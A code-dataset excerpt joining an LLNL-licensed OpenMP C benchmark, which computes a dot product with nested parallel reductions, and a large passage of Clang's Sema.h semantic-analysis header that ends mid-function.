Redistribution and use in source and binary forms, with
or without modification, are permitted provided that the following
conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the disclaimer below.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the disclaimer (as noted below)
in the documentation and/or other materials provided with the
distribution.
* Neither the name of the LLNS/LLNL nor the names of its contributors
may be used to endorse or promote products derived from this
software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
*/
#include <stdio.h>
#define min(x, y) (((x) < (y)) ? (x) : (y))
/*
use of omp target + teams + distribute + parallel for
*/
#include <omp.h>
int main(int argc,char *argv[])
{
int i;
int i2;
int len = 2560;
double sum = 0.0;
double sum2 = 0.0;
double a[len];
double b[len];
/*Initialize with some values*/
#pragma omp parallel for private (i)
for (i = 0; i <= len - 1; i += 1) {
a[i] = ((double )i) / 2.0;
b[i] = ((double )i) / 3.0;
}
#pragma omp parallel for private (i,i2) reduction (+:sum)
for (i2 = 0; i2 <= len - 1; i2 += 256) {
#pragma omp parallel for private (i) reduction (+:sum)
for (i = i2; i <= ((i2 + 256 < len?i2 + 256 : len)) - 1; i += 1) {
sum += a[i] * b[i];
}
}
/* CPU reference computation */
#pragma omp parallel for private (i) reduction (+:sum2) firstprivate (len)
for (i = 0; i <= len - 1; i += 1) {
sum2 += a[i] * b[i];
}
printf("sum=%lf sum2=%lf\n",sum,sum2);
return 0;
}
|
Sema.h | //===--- Sema.h - Semantic Analysis & AST Building --------------*- C++ -*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
//
// This file defines the Sema class, which performs semantic analysis and
// builds ASTs.
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_CLANG_SEMA_SEMA_H
#define LLVM_CLANG_SEMA_SEMA_H
#include "clang/AST/ASTConcept.h"
#include "clang/AST/ASTFwd.h"
#include "clang/AST/Attr.h"
#include "clang/AST/Availability.h"
#include "clang/AST/ComparisonCategories.h"
#include "clang/AST/DeclTemplate.h"
#include "clang/AST/DeclarationName.h"
#include "clang/AST/Expr.h"
#include "clang/AST/ExprCXX.h"
#include "clang/AST/ExprConcepts.h"
#include "clang/AST/ExprObjC.h"
#include "clang/AST/ExprOpenMP.h"
#include "clang/AST/ExternalASTSource.h"
#include "clang/AST/LocInfoType.h"
#include "clang/AST/MangleNumberingContext.h"
#include "clang/AST/NSAPI.h"
#include "clang/AST/PrettyPrinter.h"
#include "clang/AST/StmtCXX.h"
#include "clang/AST/TypeLoc.h"
#include "clang/APINotes/APINotesManager.h"
#include "clang/AST/TypeOrdering.h"
#include "clang/Basic/BitmaskEnum.h"
#include "clang/Basic/ExpressionTraits.h"
#include "clang/Basic/Module.h"
#include "clang/Basic/OpenCLOptions.h"
#include "clang/Basic/OpenMPKinds.h"
#include "clang/Basic/PragmaKinds.h"
#include "clang/Basic/Specifiers.h"
#include "clang/Basic/TemplateKinds.h"
#include "clang/Basic/TypeTraits.h"
#include "clang/Sema/AnalysisBasedWarnings.h"
#include "clang/Sema/CleanupInfo.h"
#include "clang/Sema/DeclSpec.h"
#include "clang/Sema/ExternalSemaSource.h"
#include "clang/Sema/IdentifierResolver.h"
#include "clang/Sema/ObjCMethodList.h"
#include "clang/Sema/Ownership.h"
#include "clang/Sema/Scope.h"
#include "clang/Sema/SemaConcept.h"
#include "clang/Sema/TypoCorrection.h"
#include "clang/Sema/Weak.h"
#include "llvm/ADT/ArrayRef.h"
#include "llvm/ADT/Optional.h"
#include "llvm/ADT/SetVector.h"
#include "llvm/ADT/SmallBitVector.h"
#include "llvm/ADT/SmallSet.h"
#include "llvm/ADT/SmallPtrSet.h"
#include "llvm/ADT/SmallVector.h"
#include "llvm/ADT/TinyPtrVector.h"
#include "llvm/Frontend/OpenMP/OMPConstants.h"
#include <deque>
#include <functional>
#include <memory>
#include <string>
#include <tuple>
#include <vector>
namespace llvm {
class APSInt;
template <typename ValueT> struct DenseMapInfo;
template <typename ValueT, typename ValueInfoT> class DenseSet;
class SmallBitVector;
struct InlineAsmIdentifierInfo;
}
namespace clang {
class ADLResult;
class ASTConsumer;
class ASTContext;
class ASTMutationListener;
class ASTReader;
class ASTWriter;
class ArrayType;
class ParsedAttr;
class BindingDecl;
class BlockDecl;
class CapturedDecl;
class CXXBasePath;
class CXXBasePaths;
class CXXBindTemporaryExpr;
typedef SmallVector<CXXBaseSpecifier*, 4> CXXCastPath;
class CXXConstructorDecl;
class CXXConversionDecl;
class CXXDeleteExpr;
class CXXDestructorDecl;
class CXXFieldCollector;
class CXXMemberCallExpr;
class CXXMethodDecl;
class CXXScopeSpec;
class CXXTemporary;
class CXXTryStmt;
class CallExpr;
class ClassTemplateDecl;
class ClassTemplatePartialSpecializationDecl;
class ClassTemplateSpecializationDecl;
class VarTemplatePartialSpecializationDecl;
class CodeCompleteConsumer;
class CodeCompletionAllocator;
class CodeCompletionTUInfo;
class CodeCompletionResult;
class CoroutineBodyStmt;
class Decl;
class DeclAccessPair;
class DeclContext;
class DeclRefExpr;
class DeclaratorDecl;
class DeducedTemplateArgument;
class DependentDiagnostic;
class DesignatedInitExpr;
class Designation;
class EnableIfAttr;
class EnumConstantDecl;
class Expr;
class ExtVectorType;
class FormatAttr;
class FriendDecl;
class FunctionDecl;
class FunctionProtoType;
class FunctionTemplateDecl;
class ImplicitConversionSequence;
typedef MutableArrayRef<ImplicitConversionSequence> ConversionSequenceList;
class InitListExpr;
class InitializationKind;
class InitializationSequence;
class InitializedEntity;
class IntegerLiteral;
class LabelStmt;
class LambdaExpr;
class LangOptions;
class LocalInstantiationScope;
class LookupResult;
class MacroInfo;
typedef ArrayRef<std::pair<IdentifierInfo *, SourceLocation>> ModuleIdPath;
class ModuleLoader;
class MultiLevelTemplateArgumentList;
class NamedDecl;
class ObjCCategoryDecl;
class ObjCCategoryImplDecl;
class ObjCCompatibleAliasDecl;
class ObjCContainerDecl;
class ObjCImplDecl;
class ObjCImplementationDecl;
class ObjCInterfaceDecl;
class ObjCIvarDecl;
template <class T> class ObjCList;
class ObjCMessageExpr;
class ObjCMethodDecl;
class ObjCPropertyDecl;
class ObjCProtocolDecl;
class OMPThreadPrivateDecl;
class OMPRequiresDecl;
class OMPDeclareReductionDecl;
class OMPDeclareSimdDecl;
class OMPClause;
struct OMPVarListLocTy;
struct OverloadCandidate;
enum class OverloadCandidateParamOrder : char;
enum OverloadCandidateRewriteKind : unsigned;
class OverloadCandidateSet;
class OverloadExpr;
class ParenListExpr;
class ParmVarDecl;
class Preprocessor;
class PseudoDestructorTypeStorage;
class PseudoObjectExpr;
class QualType;
class StandardConversionSequence;
class Stmt;
class StringLiteral;
class SwitchStmt;
class TemplateArgument;
class TemplateArgumentList;
class TemplateArgumentLoc;
class TemplateDecl;
class TemplateInstantiationCallback;
class TemplateParameterList;
class TemplatePartialOrderingContext;
class TemplateTemplateParmDecl;
class Token;
class TypeAliasDecl;
class TypedefDecl;
class TypedefNameDecl;
class TypeLoc;
class TypoCorrectionConsumer;
class UnqualifiedId;
class UnresolvedLookupExpr;
class UnresolvedMemberExpr;
class UnresolvedSetImpl;
class UnresolvedSetIterator;
class UsingDecl;
class UsingShadowDecl;
class ValueDecl;
class VarDecl;
class VarTemplateSpecializationDecl;
class VisibilityAttr;
class VisibleDeclConsumer;
class IndirectFieldDecl;
struct DeductionFailureInfo;
class TemplateSpecCandidateSet;
namespace sema {
class AccessedEntity;
class BlockScopeInfo;
class Capture;
class CapturedRegionScopeInfo;
class CapturingScopeInfo;
class CompoundScopeInfo;
class DelayedDiagnostic;
class DelayedDiagnosticPool;
class FunctionScopeInfo;
class LambdaScopeInfo;
class PossiblyUnreachableDiag;
class SemaPPCallbacks;
class TemplateDeductionInfo;
}
namespace threadSafety {
class BeforeSet;
void threadSafetyCleanup(BeforeSet* Cache);
}
// FIXME: No way to easily map from TemplateTypeParmTypes to
// TemplateTypeParmDecls, so we have this horrible PointerUnion.
typedef std::pair<llvm::PointerUnion<const TemplateTypeParmType*, NamedDecl*>,
SourceLocation> UnexpandedParameterPack;
/// Describes whether we've seen any nullability information for the given
/// file.
struct FileNullability {
/// The first pointer declarator (of any pointer kind) in the file that does
/// not have a corresponding nullability annotation.
SourceLocation PointerLoc;
/// The end location for the first pointer declarator in the file. Used for
/// placing fix-its.
SourceLocation PointerEndLoc;
/// Which kind of pointer declarator we saw.
uint8_t PointerKind;
/// Whether we saw any type nullability annotations in the given file.
bool SawTypeNullability = false;
};
/// A mapping from file IDs to a record of whether we've seen nullability
/// information in that file.
class FileNullabilityMap {
/// A mapping from file IDs to the nullability information for each file ID.
llvm::DenseMap<FileID, FileNullability> Map;
/// A single-element cache based on the file ID.
struct {
FileID File;
FileNullability Nullability;
} Cache;
public:
FileNullability &operator[](FileID file) {
// Check the single-element cache.
if (file == Cache.File)
return Cache.Nullability;
// It's not in the single-element cache; flush the cache if we have one.
if (!Cache.File.isInvalid()) {
Map[Cache.File] = Cache.Nullability;
}
// Pull this entry into the cache.
Cache.File = file;
Cache.Nullability = Map[file];
return Cache.Nullability;
}
};
/// Keeps track of expected type during expression parsing. The type is tied to
/// a particular token, all functions that update or consume the type take a
/// start location of the token they are looking at as a parameter. This allows
/// to avoid updating the type on hot paths in the parser.
class PreferredTypeBuilder {
public:
PreferredTypeBuilder() = default;
explicit PreferredTypeBuilder(QualType Type) : Type(Type) {}
void enterCondition(Sema &S, SourceLocation Tok);
void enterReturn(Sema &S, SourceLocation Tok);
void enterVariableInit(SourceLocation Tok, Decl *D);
/// Computing a type for the function argument may require running
/// overloading, so we postpone its computation until it is actually needed.
///
/// Clients should be very careful when using this funciton, as it stores a
/// function_ref, clients should make sure all calls to get() with the same
/// location happen while function_ref is alive.
void enterFunctionArgument(SourceLocation Tok,
llvm::function_ref<QualType()> ComputeType);
void enterParenExpr(SourceLocation Tok, SourceLocation LParLoc);
void enterUnary(Sema &S, SourceLocation Tok, tok::TokenKind OpKind,
SourceLocation OpLoc);
void enterBinary(Sema &S, SourceLocation Tok, Expr *LHS, tok::TokenKind Op);
void enterMemAccess(Sema &S, SourceLocation Tok, Expr *Base);
void enterSubscript(Sema &S, SourceLocation Tok, Expr *LHS);
/// Handles all type casts, including C-style cast, C++ casts, etc.
void enterTypeCast(SourceLocation Tok, QualType CastType);
QualType get(SourceLocation Tok) const {
if (Tok != ExpectedLoc)
return QualType();
if (!Type.isNull())
return Type;
if (ComputeType)
return ComputeType();
return QualType();
}
private:
/// Start position of a token for which we store expected type.
SourceLocation ExpectedLoc;
/// Expected type for a token starting at ExpectedLoc.
QualType Type;
/// A function to compute expected type at ExpectedLoc. It is only considered
/// if Type is null.
llvm::function_ref<QualType()> ComputeType;
};
/// Sema - This implements semantic analysis and AST building for C.
class Sema final {
Sema(const Sema &) = delete;
void operator=(const Sema &) = delete;
/// A key method to reduce duplicate debug info from Sema.
virtual void anchor();
///Source of additional semantic information.
ExternalSemaSource *ExternalSource;
///Whether Sema has generated a multiplexer and has to delete it.
bool isMultiplexExternalSource;
static bool mightHaveNonExternalLinkage(const DeclaratorDecl *FD);
bool isVisibleSlow(const NamedDecl *D);
/// Determine whether two declarations should be linked together, given that
/// the old declaration might not be visible and the new declaration might
/// not have external linkage.
bool shouldLinkPossiblyHiddenDecl(const NamedDecl *Old,
const NamedDecl *New) {
if (isVisible(Old))
return true;
// See comment in below overload for why it's safe to compute the linkage
// of the new declaration here.
if (New->isExternallyDeclarable()) {
assert(Old->isExternallyDeclarable() &&
"should not have found a non-externally-declarable previous decl");
return true;
}
return false;
}
bool shouldLinkPossiblyHiddenDecl(LookupResult &Old, const NamedDecl *New);
void setupImplicitSpecialMemberType(CXXMethodDecl *SpecialMem,
QualType ResultTy,
ArrayRef<QualType> Args);
public:
/// The maximum alignment, same as in llvm::Value. We duplicate them here
/// because that allows us not to duplicate the constants in clang code,
/// which we must to since we can't directly use the llvm constants.
/// The value is verified against llvm here: lib/CodeGen/CGDecl.cpp
///
/// This is the greatest alignment value supported by load, store, and alloca
/// instructions, and global values.
static const unsigned MaxAlignmentExponent = 29;
static const unsigned MaximumAlignment = 1u << MaxAlignmentExponent;
typedef OpaquePtr<DeclGroupRef> DeclGroupPtrTy;
typedef OpaquePtr<TemplateName> TemplateTy;
typedef OpaquePtr<QualType> TypeTy;
OpenCLOptions OpenCLFeatures;
FPOptions FPFeatures;
const LangOptions &LangOpts;
Preprocessor &PP;
ASTContext &Context;
ASTConsumer &Consumer;
DiagnosticsEngine &Diags;
SourceManager &SourceMgr;
api_notes::APINotesManager APINotes;
/// Flag indicating whether or not to collect detailed statistics.
bool CollectStats;
/// Code-completion consumer.
CodeCompleteConsumer *CodeCompleter;
/// CurContext - This is the current declaration context of parsing.
DeclContext *CurContext;
/// Generally null except when we temporarily switch decl contexts,
/// like in \see ActOnObjCTemporaryExitContainerContext.
DeclContext *OriginalLexicalContext;
/// VAListTagName - The declaration name corresponding to __va_list_tag.
/// This is used as part of a hack to omit that class from ADL results.
DeclarationName VAListTagName;
bool MSStructPragmaOn; // True when \#pragma ms_struct on
/// Controls member pointer representation format under the MS ABI.
LangOptions::PragmaMSPointersToMembersKind
MSPointerToMemberRepresentationMethod;
/// Stack of active SEH __finally scopes. Can be empty.
SmallVector<Scope*, 2> CurrentSEHFinally;
/// Source location for newly created implicit MSInheritanceAttrs
SourceLocation ImplicitMSInheritanceAttrLoc;
/// Holds TypoExprs that are created from `createDelayedTypo`. This is used by
/// `TransformTypos` in order to keep track of any TypoExprs that are created
/// recursively during typo correction and wipe them away if the correction
/// fails.
llvm::SmallVector<TypoExpr *, 2> TypoExprs;
/// pragma clang section kind
enum PragmaClangSectionKind {
PCSK_Invalid = 0,
PCSK_BSS = 1,
PCSK_Data = 2,
PCSK_Rodata = 3,
PCSK_Text = 4,
PCSK_Relro = 5
};
enum PragmaClangSectionAction {
PCSA_Set = 0,
PCSA_Clear = 1
};
struct PragmaClangSection {
std::string SectionName;
bool Valid = false;
SourceLocation PragmaLocation;
void Act(SourceLocation PragmaLocation,
PragmaClangSectionAction Action,
StringLiteral* Name);
};
PragmaClangSection PragmaClangBSSSection;
PragmaClangSection PragmaClangDataSection;
PragmaClangSection PragmaClangRodataSection;
PragmaClangSection PragmaClangRelroSection;
PragmaClangSection PragmaClangTextSection;
enum PragmaMsStackAction {
PSK_Reset = 0x0, // #pragma ()
PSK_Set = 0x1, // #pragma (value)
PSK_Push = 0x2, // #pragma (push[, id])
PSK_Pop = 0x4, // #pragma (pop[, id])
PSK_Show = 0x8, // #pragma (show) -- only for "pack"!
PSK_Push_Set = PSK_Push | PSK_Set, // #pragma (push[, id], value)
PSK_Pop_Set = PSK_Pop | PSK_Set, // #pragma (pop[, id], value)
};
template<typename ValueType>
struct PragmaStack {
struct Slot {
llvm::StringRef StackSlotLabel;
ValueType Value;
SourceLocation PragmaLocation;
SourceLocation PragmaPushLocation;
Slot(llvm::StringRef StackSlotLabel, ValueType Value,
SourceLocation PragmaLocation, SourceLocation PragmaPushLocation)
: StackSlotLabel(StackSlotLabel), Value(Value),
PragmaLocation(PragmaLocation),
PragmaPushLocation(PragmaPushLocation) {}
};
void Act(SourceLocation PragmaLocation,
PragmaMsStackAction Action,
llvm::StringRef StackSlotLabel,
ValueType Value);
// MSVC seems to add artificial slots to #pragma stacks on entering a C++
// method body to restore the stacks on exit, so it works like this:
//
// struct S {
// #pragma <name>(push, InternalPragmaSlot, <current_pragma_value>)
// void Method {}
// #pragma <name>(pop, InternalPragmaSlot)
// };
//
// It works even with #pragma vtordisp, although MSVC doesn't support
// #pragma vtordisp(push [, id], n)
// syntax.
//
// Push / pop a named sentinel slot.
void SentinelAction(PragmaMsStackAction Action, StringRef Label) {
assert((Action == PSK_Push || Action == PSK_Pop) &&
"Can only push / pop #pragma stack sentinels!");
Act(CurrentPragmaLocation, Action, Label, CurrentValue);
}
// Constructors.
explicit PragmaStack(const ValueType &Default)
: DefaultValue(Default), CurrentValue(Default) {}
bool hasValue() const { return CurrentValue != DefaultValue; }
SmallVector<Slot, 2> Stack;
ValueType DefaultValue; // Value used for PSK_Reset action.
ValueType CurrentValue;
SourceLocation CurrentPragmaLocation;
};
// FIXME: We should serialize / deserialize these if they occur in a PCH (but
// we shouldn't do so if they're in a module).
/// Whether to insert vtordisps prior to virtual bases in the Microsoft
/// C++ ABI. Possible values are 0, 1, and 2, which mean:
///
/// 0: Suppress all vtordisps
/// 1: Insert vtordisps in the presence of vbase overrides and non-trivial
/// structors
/// 2: Always insert vtordisps to support RTTI on partially constructed
/// objects
PragmaStack<MSVtorDispMode> VtorDispStack;
// #pragma pack.
// Sentinel to represent when the stack is set to mac68k alignment.
static const unsigned kMac68kAlignmentSentinel = ~0U;
PragmaStack<unsigned> PackStack;
// The current #pragma pack values and locations at each #include.
struct PackIncludeState {
unsigned CurrentValue;
SourceLocation CurrentPragmaLocation;
bool HasNonDefaultValue, ShouldWarnOnInclude;
};
SmallVector<PackIncludeState, 8> PackIncludeStack;
// Segment #pragmas.
PragmaStack<StringLiteral *> DataSegStack;
PragmaStack<StringLiteral *> BSSSegStack;
PragmaStack<StringLiteral *> ConstSegStack;
PragmaStack<StringLiteral *> CodeSegStack;
// RAII object to push / pop sentinel slots for all MS #pragma stacks.
// Actions should be performed only if we enter / exit a C++ method body.
class PragmaStackSentinelRAII {
public:
PragmaStackSentinelRAII(Sema &S, StringRef SlotLabel, bool ShouldAct);
~PragmaStackSentinelRAII();
private:
Sema &S;
StringRef SlotLabel;
bool ShouldAct;
};
/// A mapping that describes the nullability we've seen in each header file.
FileNullabilityMap NullabilityMap;
/// Last section used with #pragma init_seg.
StringLiteral *CurInitSeg;
SourceLocation CurInitSegLoc;
/// VisContext - Manages the stack for \#pragma GCC visibility.
void *VisContext; // Really a "PragmaVisStack*"
/// This an attribute introduced by \#pragma clang attribute.
struct PragmaAttributeEntry {
SourceLocation Loc;
ParsedAttr *Attribute;
SmallVector<attr::SubjectMatchRule, 4> MatchRules;
bool IsUsed;
};
/// A push'd group of PragmaAttributeEntries.
struct PragmaAttributeGroup {
/// The location of the push attribute.
SourceLocation Loc;
/// The namespace of this push group.
const IdentifierInfo *Namespace;
SmallVector<PragmaAttributeEntry, 2> Entries;
};
SmallVector<PragmaAttributeGroup, 2> PragmaAttributeStack;
/// The declaration that is currently receiving an attribute from the
/// #pragma attribute stack.
const Decl *PragmaAttributeCurrentTargetDecl;
/// This represents the last location of a "#pragma clang optimize off"
/// directive if such a directive has not been closed by an "on" yet. If
/// optimizations are currently "on", this is set to an invalid location.
SourceLocation OptimizeOffPragmaLocation;
/// Flag indicating if Sema is building a recovery call expression.
///
/// This flag is used to avoid building recovery call expressions
/// if Sema is already doing so, which would cause infinite recursions.
bool IsBuildingRecoveryCallExpr;
/// Used to control the generation of ExprWithCleanups.
CleanupInfo Cleanup;
/// ExprCleanupObjects - This is the stack of objects requiring
/// cleanup that are created by the current full expression.
SmallVector<ExprWithCleanups::CleanupObject, 8> ExprCleanupObjects;
/// Store a set of either DeclRefExprs or MemberExprs that contain a reference
/// to a variable (constant) that may or may not be odr-used in this Expr, and
/// we won't know until all lvalue-to-rvalue and discarded value conversions
/// have been applied to all subexpressions of the enclosing full expression.
/// This is cleared at the end of each full expression.
using MaybeODRUseExprSet = llvm::SmallPtrSet<Expr *, 2>;
MaybeODRUseExprSet MaybeODRUseExprs;
std::unique_ptr<sema::FunctionScopeInfo> CachedFunctionScope;
/// Stack containing information about each of the nested
/// function, block, and method scopes that are currently active.
SmallVector<sema::FunctionScopeInfo *, 4> FunctionScopes;
/// The index of the first FunctionScope that corresponds to the current
/// context.
unsigned FunctionScopesStart = 0;
ArrayRef<sema::FunctionScopeInfo*> getFunctionScopes() const {
return llvm::makeArrayRef(FunctionScopes.begin() + FunctionScopesStart,
FunctionScopes.end());
}
/// Stack containing information needed when in C++2a an 'auto' is encountered
/// in a function declaration parameter type specifier in order to invent a
/// corresponding template parameter in the enclosing abbreviated function
/// template. This information is also present in LambdaScopeInfo, stored in
/// the FunctionScopes stack.
SmallVector<InventedTemplateParameterInfo, 4> InventedParameterInfos;
/// The index of the first InventedParameterInfo that refers to the current
/// context.
unsigned InventedParameterInfosStart = 0;
ArrayRef<InventedTemplateParameterInfo> getInventedParameterInfos() const {
return llvm::makeArrayRef(InventedParameterInfos.begin() +
InventedParameterInfosStart,
InventedParameterInfos.end());
}
typedef LazyVector<TypedefNameDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadExtVectorDecls, 2, 2>
ExtVectorDeclsType;
/// ExtVectorDecls - This is a list all the extended vector types. This allows
/// us to associate a raw vector type with one of the ext_vector type names.
/// This is only necessary for issuing pretty diagnostics.
ExtVectorDeclsType ExtVectorDecls;
/// FieldCollector - Collects CXXFieldDecls during parsing of C++ classes.
std::unique_ptr<CXXFieldCollector> FieldCollector;
typedef llvm::SmallSetVector<NamedDecl *, 16> NamedDeclSetType;
/// Set containing all declared private fields that are not used.
NamedDeclSetType UnusedPrivateFields;
/// Set containing all typedefs that are likely unused.
llvm::SmallSetVector<const TypedefNameDecl *, 4>
UnusedLocalTypedefNameCandidates;
/// Delete-expressions to be analyzed at the end of translation unit
///
/// This list contains class members, and locations of delete-expressions
/// that could not be proven as to whether they mismatch with new-expression
/// used in initializer of the field.
typedef std::pair<SourceLocation, bool> DeleteExprLoc;
typedef llvm::SmallVector<DeleteExprLoc, 4> DeleteLocs;
llvm::MapVector<FieldDecl *, DeleteLocs> DeleteExprs;
typedef llvm::SmallPtrSet<const CXXRecordDecl*, 8> RecordDeclSetTy;
/// PureVirtualClassDiagSet - a set of class declarations which we have
/// emitted a list of pure virtual functions. Used to prevent emitting the
/// same list more than once.
std::unique_ptr<RecordDeclSetTy> PureVirtualClassDiagSet;
/// ParsingInitForAutoVars - a set of declarations with auto types for which
/// we are currently parsing the initializer.
llvm::SmallPtrSet<const Decl*, 4> ParsingInitForAutoVars;
/// Look for a locally scoped extern "C" declaration by the given name.
NamedDecl *findLocallyScopedExternCDecl(DeclarationName Name);
typedef LazyVector<VarDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadTentativeDefinitions, 2, 2>
TentativeDefinitionsType;
/// All the tentative definitions encountered in the TU.
TentativeDefinitionsType TentativeDefinitions;
/// All the external declarations encoutered and used in the TU.
SmallVector<VarDecl *, 4> ExternalDeclarations;
typedef LazyVector<const DeclaratorDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadUnusedFileScopedDecls, 2, 2>
UnusedFileScopedDeclsType;
/// The set of file scoped decls seen so far that have not been used
/// and must warn if not used. Only contains the first declaration.
UnusedFileScopedDeclsType UnusedFileScopedDecls;
typedef LazyVector<CXXConstructorDecl *, ExternalSemaSource,
&ExternalSemaSource::ReadDelegatingConstructors, 2, 2>
DelegatingCtorDeclsType;
/// All the delegating constructors seen so far in the file, used for
/// cycle detection at the end of the TU.
DelegatingCtorDeclsType DelegatingCtorDecls;
/// All the overriding functions seen during a class definition
/// that had their exception spec checks delayed, plus the overridden
/// function.
SmallVector<std::pair<const CXXMethodDecl*, const CXXMethodDecl*>, 2>
DelayedOverridingExceptionSpecChecks;
/// All the function redeclarations seen during a class definition that had
/// their exception spec checks delayed, plus the prior declaration they
/// should be checked against. Except during error recovery, the new decl
/// should always be a friend declaration, as that's the only valid way to
/// redeclare a special member before its class is complete.
SmallVector<std::pair<FunctionDecl*, FunctionDecl*>, 2>
DelayedEquivalentExceptionSpecChecks;
typedef llvm::MapVector<const FunctionDecl *,
std::unique_ptr<LateParsedTemplate>>
LateParsedTemplateMapT;
LateParsedTemplateMapT LateParsedTemplateMap;
/// Callback to the parser to parse templated functions when needed.
typedef void LateTemplateParserCB(void *P, LateParsedTemplate &LPT);
typedef void LateTemplateParserCleanupCB(void *P);
LateTemplateParserCB *LateTemplateParser;
LateTemplateParserCleanupCB *LateTemplateParserCleanup;
void *OpaqueParser;
void SetLateTemplateParser(LateTemplateParserCB *LTP,
LateTemplateParserCleanupCB *LTPCleanup,
void *P) {
LateTemplateParser = LTP;
LateTemplateParserCleanup = LTPCleanup;
OpaqueParser = P;
}
/// \brief Callback to the parser to parse a type expressed as a string.
std::function<TypeResult(StringRef, StringRef, SourceLocation)>
ParseTypeFromStringCallback;
class DelayedDiagnostics;
class DelayedDiagnosticsState {
sema::DelayedDiagnosticPool *SavedPool;
friend class Sema::DelayedDiagnostics;
};
typedef DelayedDiagnosticsState ParsingDeclState;
typedef DelayedDiagnosticsState ProcessingContextState;
/// A class which encapsulates the logic for delaying diagnostics
/// during parsing and other processing.
class DelayedDiagnostics {
/// The current pool of diagnostics into which delayed
/// diagnostics should go.
sema::DelayedDiagnosticPool *CurPool;
public:
DelayedDiagnostics() : CurPool(nullptr) {}
/// Adds a delayed diagnostic.
void add(const sema::DelayedDiagnostic &diag); // in DelayedDiagnostic.h
/// Determines whether diagnostics should be delayed.
bool shouldDelayDiagnostics() { return CurPool != nullptr; }
/// Returns the current delayed-diagnostics pool.
sema::DelayedDiagnosticPool *getCurrentPool() const {
return CurPool;
}
/// Enter a new scope. Access and deprecation diagnostics will be
/// collected in this pool.
DelayedDiagnosticsState push(sema::DelayedDiagnosticPool &pool) {
DelayedDiagnosticsState state;
state.SavedPool = CurPool;
CurPool = &pool;
return state;
}
/// Leave a delayed-diagnostic state that was previously pushed.
/// Do not emit any of the diagnostics. This is performed as part
/// of the bookkeeping of popping a pool "properly".
void popWithoutEmitting(DelayedDiagnosticsState state) {
CurPool = state.SavedPool;
}
/// Enter a new scope where access and deprecation diagnostics are
/// not delayed.
DelayedDiagnosticsState pushUndelayed() {
DelayedDiagnosticsState state;
state.SavedPool = CurPool;
CurPool = nullptr;
return state;
}
/// Undo a previous pushUndelayed().
void popUndelayed(DelayedDiagnosticsState state) {
assert(CurPool == nullptr);
CurPool = state.SavedPool;
}
} DelayedDiagnostics;
/// A RAII object to temporarily push a declaration context.
class ContextRAII {
private:
Sema &S;
DeclContext *SavedContext;
ProcessingContextState SavedContextState;
QualType SavedCXXThisTypeOverride;
unsigned SavedFunctionScopesStart;
unsigned SavedInventedParameterInfosStart;
public:
ContextRAII(Sema &S, DeclContext *ContextToPush, bool NewThisContext = true)
: S(S), SavedContext(S.CurContext),
SavedContextState(S.DelayedDiagnostics.pushUndelayed()),
SavedCXXThisTypeOverride(S.CXXThisTypeOverride),
SavedFunctionScopesStart(S.FunctionScopesStart),
SavedInventedParameterInfosStart(S.InventedParameterInfosStart)
{
assert(ContextToPush && "pushing null context");
S.CurContext = ContextToPush;
if (NewThisContext)
S.CXXThisTypeOverride = QualType();
// Any saved FunctionScopes do not refer to this context.
S.FunctionScopesStart = S.FunctionScopes.size();
S.InventedParameterInfosStart = S.InventedParameterInfos.size();
}
void pop() {
if (!SavedContext) return;
S.CurContext = SavedContext;
S.DelayedDiagnostics.popUndelayed(SavedContextState);
S.CXXThisTypeOverride = SavedCXXThisTypeOverride;
S.FunctionScopesStart = SavedFunctionScopesStart;
S.InventedParameterInfosStart = SavedInventedParameterInfosStart;
SavedContext = nullptr;
}
~ContextRAII() {
pop();
}
};
/// Whether the AST is currently being rebuilt to correct immediate
/// invocations. Immediate invocation candidates and references to consteval
/// functions aren't tracked when this is set.
bool RebuildingImmediateInvocation = false;
/// Used to change context to isConstantEvaluated without pushing a heavy
/// ExpressionEvaluationContextRecord object.
bool isConstantEvaluatedOverride;
bool isConstantEvaluated() {
return ExprEvalContexts.back().isConstantEvaluated() ||
isConstantEvaluatedOverride;
}
/// RAII object to handle the state changes required to synthesize
/// a function body.
class SynthesizedFunctionScope {
Sema &S;
Sema::ContextRAII SavedContext;
bool PushedCodeSynthesisContext = false;
public:
SynthesizedFunctionScope(Sema &S, DeclContext *DC)
: S(S), SavedContext(S, DC) {
S.PushFunctionScope();
S.PushExpressionEvaluationContext(
Sema::ExpressionEvaluationContext::PotentiallyEvaluated);
if (auto *FD = dyn_cast<FunctionDecl>(DC))
FD->setWillHaveBody(true);
else
assert(isa<ObjCMethodDecl>(DC));
}
void addContextNote(SourceLocation UseLoc) {
assert(!PushedCodeSynthesisContext);
Sema::CodeSynthesisContext Ctx;
Ctx.Kind = Sema::CodeSynthesisContext::DefiningSynthesizedFunction;
Ctx.PointOfInstantiation = UseLoc;
Ctx.Entity = cast<Decl>(S.CurContext);
S.pushCodeSynthesisContext(Ctx);
PushedCodeSynthesisContext = true;
}
~SynthesizedFunctionScope() {
if (PushedCodeSynthesisContext)
S.popCodeSynthesisContext();
if (auto *FD = dyn_cast<FunctionDecl>(S.CurContext))
